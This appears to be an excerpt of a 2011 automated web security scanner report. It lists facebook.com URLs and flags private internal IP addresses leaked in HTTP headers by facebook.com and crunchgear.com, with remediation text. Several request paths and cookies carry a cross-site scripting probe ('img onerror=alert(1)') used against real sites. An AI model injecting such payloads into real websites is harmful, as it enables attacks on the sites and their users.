http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/profile.php
http://www.facebook.com/profile.php
http://www.facebook.com/profile.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/recover.php
http://www.facebook.com/recover.php
http://www.facebook.com/recover.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/share.php
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/sharer.php
http://www.facebook.com/sharer.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/terms.php
http://www.facebook.com/terms.php
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/captcha/tfbimage.php
https://www.facebook.com/favicon.ico
https://www.facebook.com/favicon.ico
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/login.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/pages/create.php
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/r.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.facebook.com/recover.php
http://www.google.com/sdch/rU20-FBA.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crunchgear.com
Path:	/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.101

Request

GET /wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg HTTP/1.1
Host: www.crunchgear.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 19:11:47 GMT
Content-Length: 58718
Date: Thu, 05 May 2011 00:58:43 GMT
X-Varnish: 754024011 754023962
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.101
X-Cache: HIT

......JFIF.....Y.Y.....ZExif..MM.*.........................._.......................................................................................(...........1...........2...........i..............
...[SNIP]...

20.2. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crunchgear.com
Path:	/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.101

Request

GET /wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg HTTP/1.1
Host: www.crunchgear.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:16:47 GMT
Content-Length: 24541
Date: Thu, 05 May 2011 00:58:43 GMT
X-Varnish: 754023854 754019062
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.101
X-Cache: HIT

......JFIF.....H.H......ICC_PROFILE.......appl....mntrRGB XYZ ...........3acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

20.3. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.181.69

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.4. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.40.55

Request

Response

20.5. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.139.31

Request

Response

20.6. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.187.55

Request

Response

20.7. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.96.57

Request

Response

20.8. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.102.67

Request

Response

20.9. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.145.67

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.10. http://www.facebook.com/AOLrealestate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/AOLrealestate

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.181.29

Request

Response

20.11. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.155.55

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

20.12. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.217.127

Request

Response

20.13. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.105.31

Request

Response

20.14. http://www.facebook.com/DailyFinance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/DailyFinance

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.69

Request

Response

20.15. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.195.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.16. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.194.43

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.17. http://www.facebook.com/LadyBonesie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LadyBonesie

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.167.61

Request

Response

20.18. http://www.facebook.com/Loizza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.190.69

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.19. http://www.facebook.com/aim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aim

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.155.37

Request

Response

20.20. http://www.facebook.com/ajax/connect/feedback.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/feedback.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.73

Request

GET /ajax/connect/feedback.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.73
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0

20.21. http://www.facebook.com/ajax/connect/vote.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.146.29

Request

GET /ajax/connect/vote.php?url=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&id=fbc_10150174862354920_16359088_10150175101634920&show_all_replies=0&owns_pages=0&in_moderation_queue=0&view_as_moderator=0&controller_id=feedback_0ikA9CVHuJf7JTFou&in_contextual_dialog=0&in_aggregated_view=0&vote=spam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.29
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0

20.22. http://www.facebook.com/ajax/connect/vote.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.187.33

Request

GET /ajax/connect/vote.php?show_all_replies=0&url=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&id=fbc_10150174862354920_16359088_10150175101634920&in_moderation_queue=0&view_as_moderator=0&in_aggregated_view=0&in_contextual_dialog=0&controller_id=feedback_0ikA9CVHuJf7JTFou&owns_pages=0&vote=up HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.33
Connection: close
Date: Thu, 05 May 2011 11:42:16 GMT
Content-Length: 0

20.23. http://www.facebook.com/ajax/connect/vote.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.223.126

Request

GET /ajax/connect/vote.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.223.126
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Content-Length: 0

20.24. http://www.facebook.com/ajax/connect/vote.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.138.71

Request

GET /ajax/connect/vote.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.71
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0

20.25. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.31.123

Request

Response

20.26. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.146.21

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
